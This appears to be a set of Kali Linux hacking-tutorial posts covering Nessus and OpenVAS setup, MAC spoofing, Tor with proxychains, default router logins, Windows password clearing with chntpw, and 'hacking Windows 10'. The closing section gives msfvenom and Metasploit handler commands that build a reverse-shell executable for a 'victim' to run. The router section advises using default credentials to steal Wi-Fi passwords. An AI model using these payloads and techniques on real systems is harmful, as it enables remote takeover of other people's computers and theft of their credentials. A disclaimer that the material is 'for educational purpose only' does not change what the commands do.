Nessus and Openvas::

Nessus::
-----------

Nessus is one of the best tool for host vulnerability analysis used mainly for auditing purposes.

First download the latest version Nessus-6.9.*.deb

Installation::

dpkg -i Nessus-6.9.*,deb

Open the browser::

https://127.0.0.1:8834

Enter the root username and password

Wait for a while to complete the installation

Openvas::
-------------

Openvas is another vulnerbality analysis tool widely used.

Installation::

apt-get install openvas

will update shortly!!!!!

MAC Address Spoofing::

MAC Address Spoofing::
================

Macchanger is a free utility used to change the mac address of the network adapter. Macchanger can randomly assign a MAC address or assign a specific MAC address of your choosing.

The following command will display the different network adapters  and mac addresses in your computer
# ifconfig | grep eth

# macchanger --show wlan1

Before changing the macaddress we need to switch down the network adapter.
# ifdown wlan1

# macchanger -r wlan1   --- to change the mac address randomly
# macchanger -m xx:yy:11:22:33:zz wlan1  --- to change the macaddress manually
# macchanger --permanent wlan1              --- to make the changes permanent
# ifup wlan1                     --- to switch on the network adapter



# macchanger --list         --- displays a list of vendors and their mac

Kali Tools::

Kali Tools::
=========

Mastering the tools  and being aware when and where to use which tool comes with experience. The tools comes under the following categories::

1. Information Gathering
2. Vulnerability Analysis
3. Wireless Attacks
4. Web Applications
5. Exploitation Tools
6. Forensics Tools
7. Stress Testing
8. Sniffing & Spoofing
9. Password Attacks
10. Maintaining Access
11. Reverse Engineering
12. Hardware Hacking
13. Reporting Tools

Please browse the below url to see the tools and its uses.

http://tools.kali.org/tools-listing

Tor and ProxyChains

Tor and ProxyChains::
================

Tor and proxychains allows you to stay anonymous while you are online.

How to install and use Tor and Proxy Chains.

1. # apt-get install tor* - This will install tor browser on your box.

2. # vi /etc/proxychains.conf
 unhash the line starting with dynamic_chain
 hash the line starting with strict_chain

3. # service tor start

Now you browse anonymously as follows:-

# proxychains firefox google.com

You can also install tor browser for windows/apple and other linux distributions from the url below::

https://www.torproject.org/download/download

Wifi passwords from Router::

Wifi passwords from Router::
=====================

The default router password of different makes are as follows:

Modem Brand	Login IP	Username	Password
3Com	http://192.168.1.1	admin	admin
Belkin	http://192.168.2.1
BenQ	http://192.168.1.1	admin	admin
D-Link	http://192.168.0.1	admin
Digicom	http://192.168.1.254	admin	michelangelo
Digicom	http://192.168.1.254	user	password
Digicom	http://192.168.1.254	admin	michelangelo
Linksys	http://192.168.1.1	admin	admin
Netgear	http://192.168.0.1	admin	password
Sitecom	http://192.168.0.1	admin	admin
Sitecom	http://192.168.0.1	sitecom
Thomson	http://192.168.1.254	user	user
US Robotics	http://192.168.1.1	admin	admin

If you are connected to a network and not aware of the wifi password.  Then try logging in to the router using default password.  In most cases, the router password will be default. Once you are able to login to the router, You would be able to steal the wifi password as it is displayed under the wireless option.

Hope this helps to an extend. Thanks

Reset Windows 10 password using Kali

Reset Windows 10 password using Kali::
=============================

Suppose you forgot the windows password.

Steps as follows to reset the password using Kali as it comes with pre-installed tools for windows password reset.

Boot  the machine using live Kali DVD.

goto ::
# cd /media/mountname/windows/system32/config
# ls -a SAM   --  (which is the user credential file for windows.)
# chntpw -l  SAM --(to list the users)
# chntpw -u username SAM --(to unlock the user)
  select option 1 to clear the password
Again run the same command
# chntpw -u username SAM
  select option 4 to enable the account.

Now reboot to Windows. You should be able to login without any password and can set a new password.

Login to command prompt and type
# net user username  --( To reset the password, Enter new password)
logout and login with the new credentials.

Hope this helps..:)

Hacking Windows 10 using Kali::

Hacking Windows 10/8/7::
=================

This is for educational purpose only.

Install Kali Linux -- > Run updates


create venom in the shell to inject the victim... :)

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.2  LPORT=4444 R>yourareowned.exe

Replace ip with your local/public ip and make sure that the port is open in your box and at the service provider


Use the tool metasploit.
Commands as follows and you will be  able to do it

# msfconsole
# use exploit/multi/handler
# set payload windows/meterpreter/reverse_tcp
# set lhost 192.168.1.2  (for lan hack use local ip and for wan hack use public ip)
# set lport 4444 (for lan hack the port should be open on your box and for wan hack it should be open in your router)
# exploit


Once the victim installs the exefile, we will receive signals from the windows box under the msfconsole.

Type "help"  for the command options available. You will be able to find all windows commands.

Give a try and let me know if I could help you on this.